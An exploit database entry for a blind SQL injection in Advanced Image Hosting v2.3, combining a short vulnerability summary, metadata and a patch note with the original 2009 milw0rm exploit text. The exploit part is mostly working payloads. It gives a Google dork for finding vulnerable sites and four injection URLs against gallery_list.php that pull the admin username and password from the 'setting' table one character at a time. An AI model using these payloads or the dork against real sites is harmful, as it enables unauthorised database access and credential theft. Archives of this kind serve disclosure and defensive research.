Advanced Image Hosting (AIH) Remote Blind SQL Injection

vendor:

Advanced Image Hosting

by:

boom3rang

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Advanced Image Hosting

Affected Version From: v2.3

Affected Version To: v2.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:yabsoft:advanced_image_hosting

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Advanced Image Hosting (AIH) Remote Blind SQL Injection

Advanced Image Hosting (AIH) is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The PoC/Live Demo provided in the text shows how an attacker can use the Blind SQL Injection vulnerability to extract the username and password of the admin. The attacker can use the same technique to extract other sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.

Source

Exploit-DB raw data:

###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting    
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version       :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First charcter of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second charter of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another charters for password, changing the number of charters 5,6,7,8,9,10........?>


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-18]